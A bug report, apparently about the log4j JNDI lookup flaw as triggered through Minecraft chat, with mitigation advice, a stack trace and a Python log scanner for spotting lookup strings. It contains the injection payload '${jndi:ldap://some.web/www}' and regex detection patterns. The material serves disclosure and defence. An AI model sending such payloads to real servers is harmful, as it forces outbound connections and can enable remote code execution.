JNDI exploit in log4j
For further reference see:
- https://github.com/welk1n/JNDI-Injection-Exploit
- https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues
- https://github.com/apache/logging-log4j2/commit/c77b3cb.patch
- Besides the fix in the 2.15.0 snapshots (to be released as-is in 3 days if nothing else comes up, according to a vote from today), there is also this JVM startup parameter/system property, though it also disables otherwise useful log4j lookups in log messages: -Dlog4j2.formatMsgNoLookups=true
- (Old, but potentially relevant: https://nvd.nist.gov/vuln/detail/CVE-2019-17571)
- https://github.com/PaperMC/Paper/commit/b475c6a683fa34156b964f751985f36a784ca0e0
By simply sending chat messages, which are then logged by log4j in the server console, you can make the remote server connect to websites, or freeze it while it tries to connect somewhere; the same applies to the other clients. This is also reproducible in singleplayer, where it freezes the integrated server.
With this invalid example address copy-pasted into the client chat, you get the following error:
${jndi:ldap://some.web/www}
2021-12-09 16:55:15,949 Server thread WARN Error looking up JNDI resource [ldap://some.web/www]. javax.naming.CommunicationException: some.web:389 [Root exception is java.net.UnknownHostException: some.web]
    at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:253)
    at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
    at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)
    at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2848)
    at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
    at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
    at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
    at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
    at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
    at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
    at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221)
    at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1110)
    at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1033)
    at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
    at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)
    at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
    at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
    at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:344)
    at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:334)
    at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:216)
    at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:59)
    at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
    at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
    at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
    at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
    at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
    at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:540)
    at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:498)
    at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:481)
    at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:456)
    at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
    at org.apache.logging.log4j.core.Logger.log(Logger.java:161)
    at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2205)
    at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2159)
    at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2142)
    at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2017)
    at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)
    at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1320)
    at net.minecraft.server.MinecraftServer.a(SourceFile:998)
    at dm.a(SourceFile:249)
    at dn.a(SourceFile:282)
    at acj.bf(SourceFile:340)
    at acj.b(SourceFile:325)
    at net.minecraft.server.MinecraftServer.a(SourceFile:823)
    at net.minecraft.server.MinecraftServer.w(SourceFile:684)
    at net.minecraft.server.MinecraftServer.a(SourceFile:270)
    at java.base/java.lang.Thread.run(Thread.java:833)
Caused by: java.net.UnknownHostException: some.web
    at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:567)
    at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:327)
    at java.base/java.net.Socket.connect(Socket.java:633)
    at java.base/java.net.Socket.connect(Socket.java:583)
    at java.base/java.net.Socket.<init>(Socket.java:507)
    at java.base/java.net.Socket.<init>(Socket.java:287)
    at java.naming/com.sun.jndi.ldap.Connection.createSocket(Connection.java:346)
    at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:232)
    ... 48 more
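The trace above shows the two indicators such a lookup leaves in a server log: the raw ${jndi:...} string inside the logged chat message, and log4j's own "Error looking up JNDI resource [...]" warning once the lookup is attempted. The following scanner, an added example that is not code from this report, from Mojang or from log4j, finds both in a log file and lists the hosts the server was made to contact; the sample log lines are constructed.

```python
import re
from dataclasses import dataclass

# Raw lookup token as it appears in a logged chat message before log4j
# substitutes it (the scheme is captured generically, not only ldap).
LOOKUP_RE = re.compile(
    r"\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<target>[^/}\s]+)[^}]*\}", re.IGNORECASE)
# log4j's own warning once the lookup was actually attempted (see the trace above).
ATTEMPT_RE = re.compile(
    r"Error looking up JNDI resource \[(?P<scheme>[a-z]+)://(?P<target>[^/\]\s]+)[^\]]*\]",
    re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str      # "lookup_string" (payload logged) or "lookup_attempted" (connection tried)
    scheme: str
    target: str    # host or host:port the server tried to reach

def scan_log(lines):
    """Return every JNDI lookup indicator found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in LOOKUP_RE.finditer(line):
            findings.append(Finding(n, "lookup_string", m["scheme"].lower(), m["target"]))
        for m in ATTEMPT_RE.finditer(line):
            findings.append(Finding(n, "lookup_attempted", m["scheme"].lower(), m["target"]))
    return findings

def unique_targets(findings):
    """Distinct hosts the server was made to contact, for triage or egress blocking."""
    return sorted({f.target for f in findings})

# Constructed sample of a Minecraft server log: a harmless chat line (a non-JNDI
# lookup is not flagged), the chat line carrying the lookup from the report, and
# the warning log4j emits while resolving it.
SAMPLE_LOG = [
    "[16:55:10] [Server thread/INFO]: <Alice> hello ${date:yyyy}",
    "[16:55:15] [Server thread/INFO]: <Mallory> ${jndi:ldap://some.web/www}",
    "2021-12-09 16:55:15,949 Server thread WARN Error looking up JNDI resource "
    "[ldap://some.web/www]. javax.naming.CommunicationException: some.web:389",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind} {f.scheme}://{f.target}")
    print("targets:", unique_targets(scan_log(SAMPLE_LOG)))
```

A "lookup_string" finding without a matching "lookup_attempted" line on a patched or formatMsgNoLookups server still tells you who sent the string, which is useful for banning and for checking older, unpatched logs.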